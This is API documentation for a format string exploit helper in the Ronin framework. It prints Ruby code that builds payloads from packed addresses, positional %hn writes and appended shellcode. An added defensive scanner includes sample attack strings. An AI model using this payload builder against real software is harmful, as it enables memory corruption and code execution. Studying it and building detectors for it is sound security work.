Module: Ronin::Exploits::Helpers::FormatString

Defined in:
lib/ronin/exploits/helpers/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Target Parameters

The format string helper uses the following target parameters:

  • overwrite
  • pop_length
  • address

Payloads

Uses the Payloads::Shellcode payload by default.


Instance Attribute Details

#format_string ⇒ Object

The format string of the exploit.


# File 'lib/ronin/exploits/helpers/format_string.rb', line 46

def format_string
  @format_string
end

Class Method Details

.extended(obj) ⇒ Object


# File 'lib/ronin/exploits/helpers/format_string.rb', line 48

def self.extended(obj)
  # Load the Binary helper (pack/unpack support) into any exploit that
  # extends this module.
  obj.instance_eval { helper :binary }
end

Instance Method Details

#build_format_string ⇒ String (protected)

Builds a format string using the current target and payload to be used in the format string exploit.


# File 'lib/ronin/exploits/helpers/format_string.rb', line 105

def build_format_string
  test_target!

  buffer = pack(target.overwrite) + 
           pack(target.overwrite + (target.arch.address_length / 2))

  low_mask = 0xff
  (target.arch.address_length/2).times do
    low_mask <<= 8
    low_mask |= 0xff
  end

  high_mask = low_mask << (target.arch.address_length*4)
  high = (target.address & high_mask) >> (target.arch.address_length/2)
  low = target.address & low_mask

  if low < high
    low -= (target.arch.address_length*2)
    buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
  else
    high -= (target.arch.address_length*2)
    buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
  end

  buffer << raw_payload
  return buffer
end
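The method above shows the shape a format string payload takes: large precision paddings to drive printf's byte counter, followed by positional %hn conversions that write half-words. As an added example (not code from Ronin), the following defender-side scanner looks for exactly those markers in user-controlled strings, so an input filter or log pipeline can flag them before they reach a printf-style call. Everything here is assumed: the regular expression, the threshold, the helper names and the constructed sample lines are not part of the project.

```ruby
# Added example, not part of Ronin: flag strings carrying the printf
# conversions a format string attack depends on. All sample inputs below
# are constructed for this example.

# One printf-style conversion: optional positional index ("%7$"), flags,
# width, precision, length modifier and the conversion character.
CONVERSION = /%(?:(\d+)\$)?[-+ #0]*(\d+)?(?:\.(\d+))?(hh|h|ll|l|q|L|j|z|t)?([diouxXeEfgGaAcspn%])/

WRITE_CONVERSIONS = %w[n].freeze       # %n / %hn write to memory
READ_CONVERSIONS  = %w[s x X p].freeze # leak stack or pointed-to memory

# Returns an Array of Hashes, one per suspicious conversion in +input+.
# +max_width+ is the largest padding a legitimate caller is expected to use
# (assumed threshold); paddings used to drive a byte count are far above it.
def format_string_findings(input, max_width: 1024)
  findings = []
  input.scan(CONVERSION) do |pos, width, precision, length, conv|
    next if conv == '%' # "%%" is a literal percent sign

    reasons = []
    reasons << 'write primitive (%n)' if WRITE_CONVERSIONS.include?(conv)
    reasons << 'memory read'          if READ_CONVERSIONS.include?(conv)
    reasons << 'positional argument'  if pos
    pad = [width, precision].compact.map(&:to_i).max
    reasons << "padding of #{pad}"    if pad && pad > max_width
    next if reasons.empty?

    findings << { conversion: Regexp.last_match(0), length: length, reasons: reasons }
  end
  findings
end

def suspicious_format_string?(input, max_width: 1024)
  !format_string_findings(input, max_width: max_width).empty?
end

# Scans lines (log entries or request fields) and returns only the flagged
# ones, each paired with its findings.
def scan_lines(lines, max_width: 1024)
  lines.map { |line|
    findings = format_string_findings(line, max_width: max_width)
    [line, findings] unless findings.empty?
  }.compact
end

# Constructed sample inputs: two benign, one stack read probe, and one shaped
# like the output of build_format_string (paddings plus positional %hn writes).
SAMPLE_LINES = [
  'user=alice action=login status=ok',
  'progress=100%% stage=upload',
  'user=%x%x%x%x%x%x',
  'user=AAAA%.49152d%7$hn%.16383d%8$hn'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_lines(SAMPLE_LINES).each do |line, findings|
    puts "FLAGGED #{line.inspect}"
    findings.each { |f| puts "  #{f[:conversion]}: #{f[:reasons].join(', ')}" }
  end
end
```

A plain "%d" with a small width is not reported, so ordinary percent signs in text ("50% off") pass; only the conversions that read or write memory, use positional arguments, or carry a padding far beyond the threshold are flagged. The root fix is still to never pass user data as the format argument; this check is a detection layer, not a substitute.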

#payload_class ⇒ Class

Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.

Since:

  • 0.3.0


# File 'lib/ronin/exploits/helpers/format_string.rb', line 61

def payload_class
  Payload::Shellcode
end

#test_target! ⇒ true

Tests the selected target and checks that it contains the overwrite, pop_length and address target parameters.

Raises:

  • (TargetDataMissing)

    The target is missing either the overwrite, pop_length or address target parameters.

Since:

  • 1.0.0


# File 'lib/ronin/exploits/helpers/format_string.rb', line 78

def test_target!
  super

  unless target[:overwrite]
    raise(TargetDataMissing,"target missing the 'overwrite' param")
  end

  unless target[:pop_length]
    raise(TargetDataMissing,"target missing the 'pop_length' param")
  end

  unless target[:address]
    raise(TargetDataMissing,"target missing the 'address' param")
  end

  return true
end